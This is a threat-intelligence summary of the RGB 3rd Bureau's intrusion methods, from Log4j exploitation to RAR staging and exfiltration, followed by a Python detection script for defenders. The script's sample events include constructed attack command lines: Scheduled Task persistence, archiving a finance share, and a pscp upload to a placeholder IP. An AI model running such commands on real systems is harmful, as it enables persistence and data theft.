The RGB 3rd Bureau gains initial access by exploiting public-facing applications through well-known vulnerabilities such as Log4j, then deploys web shells for persistent access. Post-exploitation, the group uses RATs for system discovery and data collection, prefers native tools for enumeration, and relies on Mimikatz and similar tools for credential access.
Persistence is achieved through Scheduled Tasks, while packers such as VMProtect and Themida help evade detection. For discovery, customized tools and the SMB protocol are used. Data collection involves scanning for keywords and packaging results into RAR archives, which are then exfiltrated to cloud storage or remote servers using utilities such as PuTTY and WinSCP.
Overall, the sophistication of the group's attacks is not particularly remarkable. Exploiting extremely well-known vulnerabilities and phishing for initial access, and relying mostly on externally developed tooling (as well as LOLBINs) for credential access, privilege escalation, defense evasion, and exfiltration, all point to operational pragmatism for the sake of expedience and a better ROI rather than truly extraordinary technical capability or strategic depth. Even so, such an attack was sufficient to compromise the targeted organizations and make off with valuable information and data.
Organizations should enhance monitoring, apply patches, secure web servers, monitor endpoints, and strengthen authentication and remote access controls.
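The endpoint-monitoring recommendation above can be made concrete by correlating the TTP chain described in this summary (web-shell child process, Scheduled Task persistence, RAR staging, transfer via PuTTY/WinSCP tooling) across process-creation events. The following is an added example, not code from the advisory; the event format, the regular expressions and the sample events are constructed assumptions, not indicators from the report.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (simplified Sysmon Event ID 1 style):
# (timestamp, host, parent image, command line). Not real telemetry.
EVENTS = [
    ("2024-05-01T08:01:10Z", "web01", r"C:\Windows\System32\w3wp.exe",
     r"cmd.exe /c whoami"),
    ("2024-05-01T08:02:33Z", "web01", r"C:\Windows\System32\cmd.exe",
     r'schtasks /create /sc minute /mo 30 /tn "Updater" /tr C:\ProgramData\svc.exe'),
    ("2024-05-01T09:15:02Z", "web01", r"C:\ProgramData\svc.exe",
     r'"C:\Program Files\WinRAR\rar.exe" a -r C:\Users\Public\out.rar D:\share\finance'),
    ("2024-05-01T09:20:45Z", "web01", r"C:\ProgramData\svc.exe",
     r"pscp.exe -i key.ppk C:\Users\Public\out.rar user@203.0.113.10:/tmp/"),
    # Benign: a user archiving photos on another host; should not be flagged.
    ("2024-05-01T10:00:00Z", "hr02", r"C:\Windows\explorer.exe",
     r'"C:\Program Files\WinRAR\rar.exe" a C:\Users\bob\photos.rar C:\Users\bob\Pictures'),
]

# One rule per stage of the reported chain. Patterns are assumptions about how
# the tools appear on a command line; tune them to your environment.
RULES = {
    "webshell_child": (r"w3wp\.exe|httpd\.exe|tomcat", "parent"),
    "schtask_persist": (r"schtasks(\.exe)?\s+/create", "cmdline"),
    "rar_staging": (r"\brar\.exe\"?\s+a\b", "cmdline"),
    "scp_exfil": (r"\b(pscp|winscp|scp)(\.exe)?\b", "cmdline"),
}

def classify(parent, cmdline):
    """Return the set of rule names matched by a single event."""
    hits = set()
    for name, (pattern, field) in RULES.items():
        target = parent if field == "parent" else cmdline
        if re.search(pattern, target, re.IGNORECASE):
            hits.add(name)
    return hits

def correlate(events):
    """Aggregate hits per host and flag hosts showing both staging and transfer
    tooling plus at least one earlier stage (web-shell child or persistence)."""
    per_host = defaultdict(set)
    for _ts, host, parent, cmdline in sorted(events):
        per_host[host] |= classify(parent, cmdline)
    flagged = {}
    for host, hits in per_host.items():
        if {"rar_staging", "scp_exfil"} <= hits and hits & {"webshell_child", "schtask_persist"}:
            flagged[host] = sorted(hits)
    return flagged

if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Requiring several stages on the same host keeps a lone RAR or SCP invocation from paging an analyst while still surfacing the full staging-and-transfer pattern.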